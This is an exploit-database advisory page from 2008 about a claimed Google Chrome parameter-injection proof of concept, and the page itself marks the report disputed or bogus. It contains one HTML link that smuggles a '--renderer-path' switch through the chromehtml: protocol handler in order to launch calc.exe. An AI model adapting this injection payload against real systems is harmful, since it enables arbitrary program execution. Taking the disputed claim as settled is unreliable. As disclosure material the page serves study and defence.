WARNING! Fake news / Disputed / BOGUS

Google Chrome Browser (ChromeHTML://) remote parameter injection POC

2008.12.31
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-94

<!-- Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\ calc.exe"%20--"'>click me</a>

References:

http://retrogod.altervista.org/9sg_chrome.html


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top